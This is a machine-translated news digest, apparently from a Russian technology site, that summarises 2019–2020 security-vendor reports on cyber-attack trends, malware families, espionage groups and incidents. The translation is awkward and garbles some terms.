Translated by
2020/02/13 16:57:31

Cyber attacks

Cyber attacks can influence information space of the computer in which there are data, materials of the physical or virtual device are stored. The attack, usually, strikes the data medium which is specially intended for their storage, processing and transfer of personal information of the user.


Models of cyber attacks

Purposes of the attacks

Modern security has no borders
Modern security has no borders

Instruments of the attacks

Chronicle of events

2020: Rostelecom-Solar: surge in unusual cyber attacks to banks and power

Experts of the center of investigation of cyberincidents of JSOC CERT of Rostelecom-Solar company recorded splash in rather rare type of the attacks to banks and the power industry. The chain of harmful activity includes the whole four stages that allows hackers to receive control in IT infrastructure of the organization, remaining imperceptible for means of protecting — antiviruses and even sandboxes. Rostelecom-Solar reported about it on February 18, 2020. Read more here.


Research IBM X-Force: three main vectors of the attacks

On February 11, 2020 the IBM company published the annual index of threats IBM X-Force Threat Intelligence Index 2020 which showed how methods of cybercriminals for several decades of illegal access to billions of corporate and personal records and use of hundreds of thousands of vulnerabilities in the software changed. According to a research, 60% of primary penetrations into infrastructure of the victim were performed by means of earlier stolen credentials and the known vulnerabilities of software that allowed malefactors to rely less on deception of users to get data access. Read more here.

Positive Technologies: 82% of all revealed vulnerabilities are caused by errors in the code

On February 13, 2020 Positive Technologies reported that her experts analyzed a status of security of web applications and found out that in 9 cases from the 10th malefactors can attack visitors of the website, 16% of appendices are contained by the vulnerabilities allowing to receive full control over a system, and in 8% of cases — to attack an intra-company network. Besides, having got full access to web to the server, hackers can post on the attacked website own content (to execute defeys) or even to attack his visitors, for example infecting them computers HIGHER PROFESSIONAL EDUCATION.

According to a research, in 2019 significantly (by 17 percentage points in comparison with 2018) the share of the web applications containing vulnerabilities of the high level of risk decreased. The number of vulnerabilities which on average is the share of one application decreased in comparison with 2018 almost by one and a half times. Despite it, the overall level of security of web applications is estimated as low.

82% of all revealed vulnerabilities are caused by errors in the code. According to experts, even in case of the productive systems they found vulnerabilities of the high level of risk in every second. The high percent of errors in the source code demonstrates that the code does not undergo testing for existence of vulnerabilities at the intermediate stages of its creation and also that developers still pay not enough attention to security, staking on functionality of the application.

In 45% of the studied web applications experts detected shortcomings of authentication (Broken Authentication); many vulnerabilities from this category are critically dangerous.

The majority of the attacks on authentication is connected with the fact that users set only the password. The lack of the second factor does attacks on authentication simple in implementation. This problem is aggravated with the fact that users try to think up passwords more simply. The bypass of access restrictions usually leads to unauthorized disclosure, change or destruction of data,
considers Olga Zinenko, the analyst of Positive Technologies company

According to experts, 90% of web applications are subject to threat of the attacks on clients. As well as in previous years, an essential role in it is played vulnerability by "Cross-site accomplishment of scenarios" (Cross-Site Scripting, XSS). Infection of computers with the malware (a share of this method of the attacks on individuals in the third quarter year increased to 62% against 50% in the second), phishing attacks for obtaining accounting or other important data and also accomplishment of actions from a user name using the fraudulent clickjacking equipment, in particular for wrapping of likes and viewings can be examples of the attacks on users.

Cyber attacks of Magecart for the purpose of theft of payment these clients became epidemic

On January 21, 2020 the Check Point Research company published the report of Cyber Security Report 2020. The main tools which cybercriminals use for attacks to the organizations worldwide are covered in the report, and provides to cyber security specialists and heads of the companies information necessary for protection of the organizations against the current cyber attacks and threats of Fifth generation.

The report of 2020 Security Report opens the main trends and methods of the malware which researchers of Check Point observed in 2019:

  • Cryptominers still dominate in the environment of the malware — In spite of the fact that cryptomining in 2019 was considerably reduced (that is connected with falling of cost of cryptocurrencies and closing of mining service Coinhive in March), 38% of the companies worldwide were attacked by cryptominers. Cybercriminals use cryptominers because risks are rather low, and high yield. Nevertheless, according to poll of Check Point Software Technologies in the first half of 2019, least of all companies in Russia were afraid of cryptominers — only 7%
  • Increase a bot networks — 28% of the organizations underwent the attacks of botnets worldwide that is 50% more, than in 2018. Emotet was the most widespread malware for bots, mainly because of its universality and capability to distribute other malware and spam. Other actions of a botnet, such as sextortion-racketings — (the cyberfraud with e-mail based on operation of someone's sex life), and DDoS attacks, also sharply increased in 2019.
  • Target programs racketeers beat more and stronger — the number of the target attacks to the organizations is rather small, but they are capable to cause significant damage: the attacks of 2019 against the city administrations of the USA can be an example. Malefactors carefully select the victim for the attack for the purpose of racketing to gain a maximum yield.
  • Attacks on mobile devices decrease — in 2019 27% of the organizations faced cyber attacks to mobile devices, in comparison with 33% in 2018. The organizations realize threat and more carefully protect mobile devices of employees. According to poll of Check Point Software Technologies in the first half of 2019, in Russia only 16% of professionals in the field of IT set or are going to use special software for protection of mobile devices. More than a half (52%) of respondents consider the best protection prohibition on use of personal smartphones on working questions.
  • The attacks of Magecart became epidemic — Such attacks implement a malicious code in websites of online stores for theft of payment these clients. In 2019 they covered hundreds of the websites on all platforms, and both large, and medium and small business: from hotel chains to online stores.
  • Growth of the cloud attacks — As of January, 2020 more than 90% of the enterprises use cloud services. 67% of security experts complain of insufficient transparency of their cloud infrastructure, security and compliance to requirements. Scales of the cloud attacks and violations continued to grow in 2019. The wrong setup of cloud resources is still the main reason for the cloud attacks, but also increase in number of the attacks directed directly to suppliers of cloud services is observed.

The chart shows the main categories of cyber attacks in the region <!--LINK 0:78-->
The chart shows the main categories of cyber attacks in the region to EMEA
"In 2019 we observed a wide landscape of threats. We live during an era of a race of cyberarms, and growth of number and level of complexity of the attacks will increase. Even if the organization is equipped with the most comprehensive and modern products of security, risk it is necessary to be cracked all the same, it cannot be completely eliminated. The organizations need to develop the anticipatory plan to be ahead of cybercriminals and to prevent the potential attacks. Detection and automatic blocking of the attack at an early stage can prevent damage. The report of Check Point 2020 Security Report tells about the main trends to which should draw the attention of the organization and as they can win using key methods",

The report of security of Check Point 2020 Security Report is based on data of ThreatCloud intelligence, network on fight against cyber crime which provides data on threats and trends of the attacks from a global network of sensors of threats; data from the researches Check Point for the last 12 months; and the IT specialists and upper managers given from poll which estimates their readiness for threats.

The analysis of "loud" incidents in the field of information security in 2019

2019 was rich in incidents. Many cases of the wrong information storage and untimely elimination of the critical vulnerabilities which led to large date leaks were mentioned and also it is a lot of attacks on financial institutions, retail, structures of Internet of Things. Several attacks, dangerous on the effects, it was carried out on industrial enterprises. In article the largest and interesting attacks in conditional sorting according to a key gap in the system of protection or to the key action made by the malefactor are described.

The USA, China, India, Russia and Vietnam - the main sources of all types of the attacks in the I-II quarters

On December 17, 2019 it became known that referring to a research CenturyLink (USA), National coordination center for computer incidents the associate director Nikolay Murashov called the main sources of all types of the attacks in the I-II quarters 2019 of the USA China India, Russia and Vietnam (from bigger quantity to smaller). On phishing the attacks also in leaders - the USA, follows Germany Netherlands, France and Russia. The indisputable distribution championship harmful SOFTWARE through web resources belongs the USA, further China, the Netherlands, Great Britain and Germany. Nikolay Murashov shares such results of the international research.

On to data NKTsKI, main objectives computer of the attacks on information resources in RUSSIAN FEDERATION in 2019 became creditno-financial the sphere (33%), bodies government (27%), defense industry and space (18%), science and education (9%) and other (13%). In 2020 NKTsKI expects that the trend will remain and the credit and financial sphere will still be exposed to the greatest dangers because of desire of malefactors to earn.

For December, 2019 NKTsKI monitors tens of thousands of different objects from which 50% are objects of the critical information infrastructure (CII). At the end of 2019 the greatest number of the attacks managed to be reflected in the space-rocket, defense and chemical industries.

Exactly there malefactors look for any opportunity to obtain the restricted information, including information which is commercial or other secret protected by the law,


As marked out the deputy head of NKTsKI, in 2019, as well as in previous years, cases of infection with viruses encoders for the purpose of obtaining the redemption were fixed.

Against the background of other states a situation with this type of the malware in the Russian Federation it is possible to call quiet, the quantity such infections for December, 2019 decreases
reported Nikolay Murashov

However, Nikolay Murashov paid attention, the niche of viruses encoders was occupied by the malware used for capture of others resources for the purpose of cryptocurrency mining.

Against the background of other states a situation with this type of the malware in the Russian Federation it is possible to call quiet, quantity of such virtual money it is rather high therefore wishing them it is easy to earn also becomes much. Miners crack computers of normal users and use their computing resources in the purposes. For generation of virtual coins about 80% of power of the captured computer can be used. Very often legal users do not know about it,
noticed Nikolay Murashov

As Nikolay Murashov specified, capture for mining of servers of the large companies threatens with significant decrease in their performance that attracts significant damage for business.

It should be noted that the number of the revealed cryptocurrency mining cases using the infected information resources of the different state and municipal organizations is huge. In this case malefactors infect web pages, and mining is performed when users of resources browse them in the browser,
gave an example Nikolay Murashov[1]

Fortinet: Development of AI and investigation in the field of cyberthreats will change traditional advantages of cybercriminals

On December 5, 2019 the Fortinet company issued the forecast of a landscape of threats for 2020 and the next years, FortiGuard Labs prepared by team of experts. The research opens the directions in which cybercriminals will act in the near future. Besides, acceptances which will help the organizations to be protected from future attacks were designated.

Fortinet: development of AI and investigation in the field of cyberthreats will change traditional advantages of cybercriminals
"Earlier success in actions of malefactors was connected in many respects with expansion of a surface of the cyber attacks and the spaces which are formed as a result of it in security caused by digital transformation. Recently their techniques of carrying out the attacks became even more sophisticated thanks to integration of the AI and swarm technology initial forms. Fortunately, it is possible to recover the previous level of security if many companies adhere to identical strategy for protection of the networks through which criminals will organize attacks. It will demand the unified approach using the large-format, integrated and automated solutions for ensuring protection and accountability of all network segments and also different peripheral devices, from IoT to dynamically connected clouds",

'Derek Menki, the head of the safety department and the analysis of global threats, Fortinet noted'

As noted in Fortinet, in recent years techniques of carrying out cyber attacks became more and more sophisticated that led to growth of their efficiency and speed. This trend, most likely, will remain until in the market there are enough organizations which will change the approach to the strategy of protection. Considering scales of a landscape of global threats, speed and complexity of cyber attacks, the organizations should react to the arising threats in real time, without lagging behind operation of machines effectively to resist to aggressive actions. In this fight will become vital to apply the last achievements in the field of the artificial intelligence (AI) and a research of threats.

One of long-term goals in development of AI for security is creation of adaptive system of immunity to threats, the working similarly immune system of the person. Development of such AI of first generation was directed to use of different models of machine learning. They studied, adjusted and offered a certain action plan for attack reflection. In the AI systems of the second generation the emphasis was placed on creation of the mechanism of the intellectual analysis. Its level considerably grew by this time and allowed to reveal the patterns significantly improving work of different functions, such as access control by accommodation of students of nodes in all directions of protection. Development of the AI systems of third generation goes the way failure from use of the monolithic center of processing for benefit of creation of a system of regional students of nodes. Data collect locally and are used for the distributed comparison, correction and the analysis. It will be important extremely for the companies which look for ways of protection of the expanding peripheral segments.

In addition to application of traditional forms of the analysis of threats using data from open sources or after studying of internal traffic and accumulated information, future systems of machine learning will begin to apply actively over time the data collected from peripheral devices of new generation and transferred to the local studying nodes. Tracing and comparing information in real time, an AI system will be able to have a better understanding of a current status of threats. She will also be able to adjust operation of local devices, setting them governed for response to incidents. It will allow future AI security systems to distinguish threats, to adjust the of actions, to trace and be ready to response measures, communicating within network. Finally, the distributed system of training will allow to integrate data sets to adapt to the changing conditions, trends and events. Thus, each event will improve quality all of a system. As a result, information on an incident obtained in one place will increase awareness on the current threats for all system.

Implementation of AI allows the companies not only to automate accomplishment of tasks, but also opens a possibility of creation of an automated system of search and identification of cyber attacks – both after emergence of signs, and before implementation of the scenario. Thanks to sharing of machine learning and statistical analysis, the organizations can develop the individual action plan with a support on AI for improvement of solvability of threats and reaction. The prepared scenarios of reaction (playbooks) should learn to reveal patterns (patterns) using which AI will predict actions of the attacking party, to prompt time of the probable beginning of the following attack and even to identify the suspects standing behind threat. If these data can be provided to AI training system, then removed trainees of a note will be able to support the effective and anticipatory protection which is not limited only to detection of threats, but allowing to predict also the subsequent actions to interfere proactively with process and to coordinate actions with other notes for simultaneous counteraction on an attack propagation path.

One of the most important factors of fight against espionage, according to Fortinet, is the effective counterintelligence. Same it is fair also for cyber attacks or protection where all actions are carefully monitored. The defending party has clear advantage in access to different information on threats. Cybercriminals usually have no such potential to which means of machine learning and AI were added. However application of smart tricks can lead to response measures from malefactors. They learn to distinguish legitimate traffic from tricks and try to do it imperceptibly not to reveal themselves in attack time. Effectively to resist to such strategy, the organizations will need to add scenarios of reaction and the improved AI algorithms to the arsenal. It will help not only to detect the violators occupied with analysis of legitimate traffic but also will improve technology of tricks that will make impossible their difference from legitimate messages. In the future the organizations should learn to react to any espionage acceptances prior to active actions, reserving superiority in control.

The organization activity connected with cyber security provides them a number of the unique privileges concerning access to personal information; representatives of underworld have no such rights. It allows law enforcement agencies to create own command centers with a global scope and to extend the actions to individuals, having an opportunity to watch cybercriminals in real time and to react to their actions. The existing system of lawful acts and also communications with public and private services can be also useful to identification of violators and response. It is possible to expect emergence of initiatives of formation of uniform approach for communications between law enforcement agencies of the international and local levels, the government organizations, the corporate sector and experts in the field of security. It will contribute to the development of a system of timely and safe information exchange for building of protection of crucial infrastructure and gain of fight against cybercrimes.

The opportunities entered by the organizations to the strategy of protection will hardly remain unaddressed from the opponent and will have response. Implementation of the improved methods of detection and counteraction to cyber attacks will lead to attempts of cybercriminals to make something else, even more serious. Against the background of emergence of more perfect methods of the attack, expansion of the directions of the potential attacks, implementations of more smart AI systems, ingenuity of representatives of cyberunderworld also does not decrease.

In the recent report of Fortinet Threat Landscape growth of popularity of different advanced techniques of deviation was noted. Their development is directed specially to avoiding detection, to turn off functions of protection and the monitoring device, to cause a loss, working "under a sight" the systems of protection and applying tactics of LoTL ("Living off The Land") – use of the legitimate set software and masking of harmful traffic under legal. Many modern malwares already contain in themselves the functions allowing to evade from detection by an anti-virus software or other means of counteraction to threats. But malefactors continue to apply more and more sophisticated methods of complication and counteraction to the analysis. When using such growth strategies the value of "weak points" which can remain in security aids considerably increases and appear as a result of human errors.

The last several years in the market growth of popularity of swarm technology connected with accomplishment of an assigned task at the expense of the massed, coordinated, same actions was observed. Application of means of machine learning and AI in the attacks against legitimate networks and devices led to emergence of one more method of application of this technology. On the one hand, its achievements are important for the solution of applied tasks in the field of medicine, transport, mechanical engineering, automation. However at malicious use in conditions when the organizations do not make changes to the strategy of protection, the parity can be broken for benefit of malefactors. Cybercriminals can apply Swarm-technology in a bot attacks to penetration into network, suppression of internal means of defense, increase in efficiency of search and theft of data. It is expected that over time there will be specialized bots equipped with certain functions which will exchange data in real time and to compare them. As a result the speed of selection of the purposes will increase, and tactics of carrying out the attack will become more various. Cybercriminals will be able to attack already not only one, and and at once the set is more whole at the same time.

Penetration of 5G networks can become the catalyst for development of the functional Swarm-attacks over time. The possibility of building of local ad hoc networks which are capable to exchange and process quickly data and also to start in operation of application will be their cornerstone. At this inadequate use of a 5G and peripheral Edge-calculations by the channel for distribution of a malicious code there can be cracked devices. If to assemble them in group, then there will be possible a carrying out the coordinated attacks at 5G speeds. In view of high-speed performance, intellectuality degree and also the local nature of carrying out such attacks, under the threat there can be low technologies of protection that will set thinking on search of ways for effective opposition to such threats.

Earlier on search of vulnerability of zero day and development of an exploit many forces and time left traditionally. Therefore cybercriminals did not hurry with their application, holding in the arsenal, so far there were other options for the attack. The present situation is characteristic growth of the possible directions of threats and also simplification of a problem of detection of vulnerabilities. It led to threat of potential growth of number of vulnerabilities of zero day. Use of technologies of a fazzing and systematic search ("mining") of vulnerabilities of zero day using AI also promote the exponential growth of number of similar cyber attacks. Therefore it is necessary to take beforehand measures for protection to resist to this trend.

Accenture: main threats of information security of business

On September 20, 2019 the Accenture company provided results of a research in which revealed the main threats of information security of business in 2019. According to Accenture, the market of services of cyber security grows at the rates similar to the Digital markets and IT. Accenture predicts that by 2021 the volume of the world market of cybersecurity will increase by 66% and will make $202 billion. At the same time the cumulative world damage from cyber attacks can grow by 2021 by 39% to $2.1 billion Read more here.

Trend Micro: The number of the besfaylovy attacks in the first half of the year grew by 265%

On August 30, 2019 it became known that the Trend Micro Incorporated company, the world leader in the field of solutions for cyber security, published the summary report for the first half of 2019. In it the surge in prevalence of the besfaylovy attacks directed to concealment of harmful actions is noted: the number of the detected threats such showed 265 percent growth in comparison with the first half of 2018.

The results received in 2019, thus, confirm the numerous forecasts made by Trend Micro in 2018. Namely, malefactors work more smart now and are guided by the enterprises and Wednesdays which will provide them the greatest return from the enclosed efforts.

Refinement and cunning — it is so possible to characterize modern cyberthreats. Corporate technologies and IT infrastructures become more and more connected and more 'smart'. Malefactors make the deliberate, purposeful, artful attacks which imperceptibly use people, processes and technologies. In terms of business, digital transformation and transition to cloud computing continue to gain popularity that increases area of vulnerability for the corporate attacks. To be guided in these changes, the companies need the technology partner who can integrate human experience with advanced technologies of security for the best detection, comparison, reaction and elimination of threats,


Along with growth of number of besfaylovy threats in the first half of year, the frequency of commission by malefactors of the attacks who bypass traditional filters of security as involve memory of a system is noted, are stored in the register or abuse legitimate tools. Also sets of exploits returned: their quantity showed 136 percent growth in comparison with the first half of the year 2018.

Harmful SOFTWARE for cryptocurrency mining saved the status of the most often detected threat in the first half of 2019, and malefactors used it for the attacks on servers and cloud environments more and more. In confirmation of one more forecast quantity routers participating in the possible attacks on an input jumped by 64% in comparison with the first half of 2018, and more and more worm Mirai options look for open devices.

In addition, the number of schemes of digital racketing showed growth by 319% from the second half of 2018 that corresponds to the previous forecasts. The compromise of business e-mail (BEC) remains the main threat: the number of detection of such threats grew by 52% till the last six months. The number of the files, e-mails and URL addresses related to racketeers, also grew by 77% for the same period.

Trend Micro detected and blocked 1.8 billion threats of racketeers from January, 2016 to June, 2019 worldwide. 4.15% of percent of all infections on encoders in the region of Eastern Europe are the share of Russia. To Ukraine – 0.92% that globally 0.14%. In Central Asia, in Kazakhstan - 0.04%, globally 0.02%. In the Western Asia, in Azerbaijan - 0.10%, globally 0.04%; and in Georgia - 0.02% that globally 0.01%.

Russia enters in top-10 the countries in which mobile viruses racketeers - to 4.2% among other countries are recorded (February, 2019) and up to 785 blocking (March, 2019)

In total the products Trend Micro blocked more than 26.8 billion threats in the first half of 2019 that is 6 billion more, than for the same period of last year. It should be noted that 91% from them came to corporate networks by e-mail. Elimination of such advanced threats requires deep intellectual protection which can compare data from different gateways, networks, servers and endpoints in the best way to reveal and stop the attacks.

Check Point: The number of the attacks on mobile banking increased in the first half of the year twice

On August 1, 2019 the Check Point Software Technologies company issued the report of Cyber Attack Trends: 2019 Mid-Year Report. Hackers continue to develop the new tool kits and methods aimed at corporate data which are stored in cloud infrastructure; personal mobile devices; different applications and even popular mail platforms. Researchers note that any of sectors is completely not protected from cyber attacks.

Categories of cyber attacks on regions according to Check Point Software Technologies

Experts of Check Point revealed key trends of cyberthreats in the first half of the year 2019:

  • Mobile banking: the number of the attacks increased twice in comparison with 2018. Bank malware — very widespread mobile threat. The bank malware is capable to steal payment and credentials, funds from bank accounts of the victims. New versions of bank malware are ready to mass distribution for all who are ready to pay for them.
  • Attack on a supply chain: cybercriminals can expand the influence, having used an attack on a supply chain of the company. At such type of cyber attack hackers implement a malicious code directly in the software of the company victim. After accomplishment of this malicious code criminals can get access to private information of the company.
  • E-mail: malefactors use different methods for a bypass of solutions of security and spam filters. For example, they send the difficult coded e-mails and also a complex basic code which mixes normal text letters with HTML characters. Besides, malefactors apply methods of social engineering and also change and personalisation of contents of e-mails.
  • Cloud storages: the growing popularity of public cloud environments led to increase in number of the cyber attacks aimed at huge volumes of the confidential data which are on these platforms. The most serious threats for security of clouds in 2019: wrong configuration and bad management of cloud resources.

"Neither cloud storages, nor our smartphones and e-mail — any environment is not insured from cyber attacks. Such threats as the personalized attacks of racketeers, the DNS attacks and cryptominers, will be still relevant in 2019. Experts in security should be aware of the last threats and the technician of the attacks to provide the best level of protection for the organizations"

Types of malware according to Check Point Software Technologies

The most active malware in the first half of the year 2019 according to Check Point Software Technologies:

  1. Emotet (29%) is the advanced, self-extending modular trojan. Emotet was once used as a bank trojan, and recently is used in a delivery quality of other malware or harmful campaigns. He uses several methods to avoid detection. Also extends through phishing spam message, the containing harmful investments or references.
  2. Dorkbot (18%) — the worm on the basis of IRC intended for remote accomplishment of the code by his operator. Also with its help it is possible to load additional malware into the infected system for theft of confidential information.
  3. Trickbot (11%) — Trickbot is the Dyre option which appeared in October, 2016. From the moment of the first emergence it was aimed at banks generally in Australia and Great Britain, and recently it began to appear also in India, Singapore and Malaysia.

The most active cryptominers in the first half of the year 2019:

  1. Coinhive (23%) is the cryptominer intended for production of the Monero cryptocurrency without the knowledge of the user when that visits websites. Coinhive appeared only in September, 2017, but as of August, 2019 already struck 12% of the organizations worldwide.
  2. Cryptoloot (22%) is the miner which is built in the website using JavaScript of the code. Mines the Monero cryptocurrencies without the permission of the user.
  3. XMRig (20%) is the Open source software for the first time detected in May, 2017. It is used for Monero cryptocurrency mining.

The most active mobile threats of the first half of the year 2019:

  1. Triada (30%) is the Modular backdoor for Android which provides the privileges of the superuser for the loaded malware and also helps to implement it in system processes. Triada was also noticed behind substitution of the URL addresses loaded in browsers.
  2. Lotoor (11%) is the program using vulnerabilities in the Android operating system for receiving exclusive root-access on the cracked mobile devices.
  3. Hidad (7%) is the Modular backdoor for Android which grants the superuser's rights for the loaded malware and also helps to implement it in system processes. He can get access to the key parts of security which are built in OS that allows it to obtain confidential data of the user.

In Russia was very actively harmful mobile software which was called Agent Smith. Under the guise of the hidden application connected with Google, the malware uses the known vulnerabilities of Android and automatically replaces installed applications with harmful versions imperceptibly for the user. Users loaded the application from popular unofficial app store 9Apps. As of August, 2019 Agent Smith infected about 57 thousand devices in Russia.

Top of malware according to Check Point Software Technologies

Malware top for banks in the first half of the year 2019:

  1. Ramnit (28%) is a bank trojan which abducts data of accounts of clients of bank passwords FTP, files cookies for sessions and personal data.
  2. Trickbot (21%) is the dominating bank trojan which is constantly filled up by opportunities, functions and propagation vectors. It allows Trickbot to be the flexible and configured malware which can extend within the multi-purpose campaigns.
  3. Ursnif (10%) is the trojan working at the Windows platform. Usually it extends through sets of exploits - Angler and Rig. He can abduct information connected with the payment software of VeriFone Point-of-Sale (POS). For this purpose the trojan contacts a remote server to load collected information and to receive instructions. After that it loads files into the infected system and executes them.

The report for the first half of the year 2019 "Cyber Attack Trends: Annual Report 2019" shows all possible landscape of cyberthreats. Outputs are based on data of Global Threat Impact Index and ThreatCloud Map which were developed by ThreatCloud intelligence, network on fight against cyber crime which provides data on threats and trends of the attacks from a global network of sensors of threats.

The CloudMid program spy attacked the Russian organizations from health sector

On July 18, 2019 Kaspersky Lab reported that the Russian organizations from health sector faced purposeful cyber espionage.

Experts of Kaspersky Lab recorded a series of the target attacks to the Russian organizations from health sector. Incidents occurred in the spring and at the beginning of summer of 2019, several organizations in the southern regions of Russia became the victims of malefactors. As the analysts attacking freely found out speak Russian, however territorially are outside Russia. Data collection of financial character was a main objective of malefactors.

Infection of computers in the organizations working in the field of health care was performed using the unknown before the CloudMid program spy. The malware was sent by e-mail and masked under the VPN client of the known Russian company. However this mailing was not mass: the e-mails containing the program spy received only some organizations of certain regions, and it speaks about special-purpose character of the attack.

After installation in the CloudMid system started collecting of the documents which are stored on the infected computer. For this purpose, in particular, the malware took screenshots several times in a minute. Experts of Kaspersky Lab found out that attacking they collect information of financial character from the infected machines: contracts, the directions for expensive treatment, invoices and other documents which anyway belong to financial activities of the organizations of health care.

Health sector began to interest cybermalefactors, including organizers of the difficult and reserved target attacks. The mailing of the CloudMid program spy detected by us – next to that confirmation. In this case the attacks, though did not differ in good technical development, but were target, and malefactors all the same managed to receive the desirable. For this reason the organizations from health sector should pay special attention to questions of cyber security, in particular to train employees in skills of recognition of threats and also to use reliable protective solutions,
noted Dmitry Kuznetsov, the anti-virus expert of Kaspersky Lab

Solutions of Kaspersky Lab will recognize all known samples of the CloudMid program spy and protect users from this threat.

Programs racketeers were succeeded by more targeted types of the attacks

On May 23, 2019 the Fortinet company published results of the quarterly report on global security risks of Global Threat Landscape Report.

According to the company, shows researches that cybercriminals continue to improve methods of the attacks, including use specially developed programs racketeers and create the individual code for implementation of a number of the directed attacks, and even use the LoTL-attacks and the general infrastructure for expansion of the opportunities.

Main outputs of a research:

  • The activity of criminals until a compromise is three times higher during business week, at the same time traffic after a compromise is in this respect less differentiated.
  • Some threats are more often than others use uniform general infrastructure, than some unique or specialized by the Example of technologies to which cybercriminals pay special attention recently, the web platforms facilitating to users and the enterprises creation of websites are.
  • Programs racketeers did not disappear, and became more targeted and are aimed at wealthy users.
  • Malefactors even more often use the tools of dual purpose or tools which are already installed on direct systems and allowing to perform cyber attacks.

The research setting as the purpose to find out whether malefactors break the attacks on separate stages, performing them in different days of the week, showed that cybercriminals aim to use to the maximum the opening opportunities always. When comparing volume of web filtering on two phases of step-by-step cyber attacks (cyber kill chain phases) on the working days of week and on days off, it became clear that the activity until a compromise is three times higher during business week, at the same time traffic after a compromise is in this respect less differentiated. It mainly is explained by the fact that for search of vulnerabilities often someone who could perform any operations is required to follow, for example, the link in the phishing letter. As opposed to it, for active actions (command-and-control, C2) of similar requirements is not present therefore such activity can be observed at any time. Cybercriminals understand it and try to use opportunities to the maximum during business week when users most often are in the Internet.

Extent of use by different threats of this or that infrastructure allows to make idea of a number of important trends. Some threats are more often than others use uniform general infrastructure, than some unique or specialized infrastructures. Nearly 60% of threats were performed within at least one general domain, and it, in turn, indicates that the majority a bot networks use already created infrastructure. Troyan of IcedID is an example of such approach "why to buy or build if it is possible to lend". Besides, when threats use a certain general infrastructure, they, as a rule, do it at the same stage of a kill-cheyn. Situations when the threat uses a certain domain for studying of a situation and search of vulnerabilities, and then in the same domain performs a broadcast of traffic C2, occur quite seldom. It means that infrastructure plays a special role when implementing harmful campaigns. Understanding of what threats use the same infrastructure and in what points of a chain of the attacks, allows the organizations to predict potential points of development and change of malware or a bot networks in the future.

Malefactors, as a rule, pass from one opportunity to another with the whole clusters, aiming at the most successfully used vulnerabilities and technologies which are at present on rise quickly to seize the opened opportunity. An example of technologies to which cybercriminals for May, 2019 pay special attention are the web platforms facilitating to users and the enterprises creation of websites. These platforms, together with plug-ins from third-party developers, continue to remain a widespread target for cybercriminals. All this confirms need of instant installation of security updates and also requires from the organizations of complete understanding of constantly developing world of cyber-threats if they want to remain on a step ahead of hackers.

In general, programs racketeers popular earlier were succeeded by more targeted types of the attacks, nevertheless, it does not mean that programs racketeers disappeared from the horizon at all. Moreover, they became more purposeful and are focused on more wealthy users. It is possible to give the LockerGoga program which is used for the targeted multi-stage attack as an example. In terms of functional complexity this program little in what differs from other similar programs racketeers, but if in the majority of similar tools to disguise them from antiviruses, a certain level of obfuscation is used, in the analysis of this program of any considerable obfuscation it was revealed not. It says about special-purpose character of the attack and that during creation of this program malefactors knew that future victims will specially not look for this malicious code. One more example – Anatova. As well as for the majority of other programs racketeers, a main goal of Anatova – to cipher as much as possible files on the system of the victim, except for those files which could affect stability of the infected system. Besides, the program avoids computers which look as though they were used for the analysis of malware or as a bait. Both of these versions of programs racketeers indicate that leaders of security should set still timely updates and perform data backup for protection against normal programs racketeers. But counteraction to targeted threats and unique methods of the attacks requires more specialized protection.

As malefactors use the same business models, as their victims to achieve the maximum effect of the activity, methods of the attacks often continue to develop even after a successful debut. For this purpose malefactors even more often use the tools of dual purpose or tools which are already installed on direct systems and allowing to perform cyber attacks. This tactics which received the name "living off the land!" (LoTL) ("life on a pasture") allows hackers to disguise the activity under quite innocent processes, complicating that their detection. These tools also considerably aggravate attack effects. Unfortunately, malefactors can use the most different legitimate tools which allow them to achieve the goals and to pass out of sight. For competent protection against the similar attacks the organizations should limit access to the separate, authorized instruments of administration and log files in the environments.

To improve capability of the organization not only to be protected properly from threats, but also to be prepared for development and automation of future attacks, intelligent tools are necessary for predictive analysis of threats which would be available on all distributed network. The gained knowledge will help to reveal trends, to estimate evolution of the different methods directed to the surface of the digital attack and to define for themselves cyberhygiene priorities, proceeding from what activity of malefactors is directed to. The value of this analysis and capability will take measures on the basis of these data is considerably reduced for lack of the safety controls allowing to apply in real time data retrieveds. Only in the presence of the large-scale, integrated and automated platform approach to security it is possible to provide fast and large-scale protection for all networked environment, from Internet of Things and periphery to a core of network and multicloud infrastructures.

Unfortunately, we still see that the cybercriminal community in the activity considers the national strategy and methodologies and also technical features of devices and network technologies to which their attacks are directed. The organizations should review the strategy better to be protected from cyber-risks and to learn to manage more effectively them. One of the first important steps is in considering cyber security as science, and with the maximum scrupulousness to treat a basis of the infrastructure for what, in turn, it is necessary to provide the high speed and network coherence of a cyberspace for effective protection. Use of platform approach to security, micro and macrosegmentations, machine learning technologies and automation as construction blocks of artificial intelligence, opens huge opportunities for effective counteraction to cybercriminals.

Phil Quade, Chief information security officer of Fortinet

The TaskMasters cybergrouping attacks the organizations in Russia and the CIS

On May 13, 2019 the Positive Technologies company reported that her experts of Expert Security Center detected cybergrouping presumably with Asian roots. Malefactors attacked more than 30 organizations from the different industries, including the industry, power and oil and gas sectors of Russia, the CIS and other countries. At the same time the considerable number of the victims was in Russia and the CIS. A main goal of group — theft of confidential information of the organizations. The group acts on an extent of at least several years: traces of activity of TaskMasters since 2010 are detected.

The group used an unusual method of fixing in IT infrastructure: participants created specific tasks (tasks) in a task scheduler (therefore grouping received the name TaskMasters). The task scheduler allows to execute the OS commands and to start software at a given time specified in a task. The scheduler of AtNow used by cybergrouping allows to carry out tasks not only locally, but also on remote computers of network and to do it irrespective of time settings of these nodes. Besides, this utility does not require installation. All this simplifies attack automation.

After penetration into a local network malefactors investigate infrastructure, operate vulnerabilities, load malware on the compromised nodes and far off use them for espionage. It is possible to detect the similar attacks using specialized means of protecting, including PT Network Attack Discovery, and it is necessary to attract professionals in investigation of cyberincidents to the analysis of the attacks and their prevention.
Alexey Novikov, director of expert center of security Positive Technologies

Experts of Positive Technologies assume that members of the group of TaskMasters can be residents of the countries of Asia. References of the Chinese developers occur in the code of the tools used by them, during some attacks connections from the IP addresses from China were recorded, and keys for some versions of programs can be detected at forums where residents of this country communicate. In addition, many utilities from a packet of TaskMasters contain the error messages and other debug information written in English with errors that indicates that it is not a mother tongue for developers.

For the last two and a half years specialists of expert center of security Positive Technologies made more than fifty investigations of incidents of information security among which ICEFOG grouping detection, identification of ART on the state and private companies and also investigation of actions of the Cobalt grouping which traces of activity of participants experts managed to detect even after arrest of her leader.

Cyber attacks left Venezuela without light for several days

On March 11, 2019 became the fifth in a row day of lack of electricity honor in all Venezuela. The president of the country  Nicolás Maduro said that cyber attacks from the USA became the reason of blackout. Read more here.

Damages from the coordinated global cyber attack are assessed

